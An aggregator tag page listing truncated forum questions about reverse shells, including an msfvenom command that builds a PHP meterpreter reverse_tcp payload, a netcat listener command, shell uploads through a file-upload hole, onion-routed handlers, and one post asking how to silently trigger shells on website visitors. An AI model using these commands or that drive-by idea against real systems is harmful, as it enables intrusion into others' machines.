reverse shell – Page 7 – WindowsTechs.com

PHP reverse shell is not responding back [closed]

Posted on March 2, 2021 by Adnan Khan

I created a php reverse shell using msfvenom utility like:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<MY_IP> LHOST=4444 -f raw > reverse_shell.php

And I created a listener using msfconsole using multi/handler. I uploaded the … Continue reading PHP reverse shell is not responding back [closed]→

IIS Different user with reverse shell

Posted on January 31, 2021 by AMR

There is PHP website and IIS web server. The website has unrestricted file upload vulnerability. When I upload a reverse shell to connect back to netcat listener or meterpreter it connects with username iis_met, but when I upload a PHP she… Continue reading IIS Different user with reverse shell→

IIS different user with reverse shell [closed]

Posted on January 31, 2021 by AMR

there is PHP website and IIS web server, when I upload reverse shell to connect back to netcat listener or meterpreter it connects with username iis_met,but when I upload php shell that will just give me access to OS files through web brow… Continue reading IIS different user with reverse shell [closed]→

How do I connect my onion service to msfconsole? [closed]

Posted on January 19, 2021 by Procapagana

So I’m using this guide:
https://steemit.com/hacking/@shitcoinloard/establishing-reversehttp-msf-connections-over-onions-no-port-forwarding
The victim is my win10 machine with av disabled. The python server is hosted on 127.0.0.1 8080, sam… Continue reading How do I connect my onion service to msfconsole? [closed]→

Getting a shell from a windows machine [closed]

Posted on January 16, 2021 by Colgate

If you get creds for an account in active directory, can you simply use a standard PHP or bash script to get a reverse shell through cmd and catch it with netcat on the machine you’re trying to make the connection to or not?
Does it have … Continue reading Getting a shell from a windows machine [closed]→

Why a curl piped bash command works but not the direct command?

Posted on January 13, 2021 by alex55132

So im doing some pentesting in a TryHackme box (Chill Hack) and I’ve come to some trouble. In this box I have available an input in a website where I can inject commands to the vulnerable system.
This input has filters so I cannot use bash… Continue reading Why a curl piped bash command works but not the direct command?→

Why is the first step for an attacker to get Reverse Shell after getting RCE?

Posted on January 12, 2021 by AWS Learning

If someone is having a Remote Code Execution, that means, one can run the commands on the server, then why does he need to get the Reverse Shell?
Even though I can run system commands, then why do I go for Reverse Shell?
I am finding the p… Continue reading Why is the first step for an attacker to get Reverse Shell after getting RCE?→

how to get a shell after you get admin credentials

Posted on January 11, 2021 by Colgate

so lets assume that somehow I got domain admin credentials in an active directory enviorment.
How many different ways are there to get a shell after that .

Continue reading how to get a shell after you get admin credentials→

How do I stabilize a reverse shell in when the attack box is using powershell?

Posted on January 4, 2021 by user248411

I’ve managed to get a version of netcat onto my Windows machine and I can run the standard:
nc -lvnp 1234

and this properly connects to the victim’s machine, but it’s a very fragile connection. Ctrl + C will just drop the connection, tab … Continue reading How do I stabilize a reverse shell in when the attack box is using powershell?→

Trigger a reverse shell on victims from a website

Posted on December 27, 2020 by Pretty_Confused

Is it possible to execute a reverse shell script (in the background) on victims’ computers when they visit my webpage without any suspicious alerts?

Continue reading Trigger a reverse shell on victims from a website→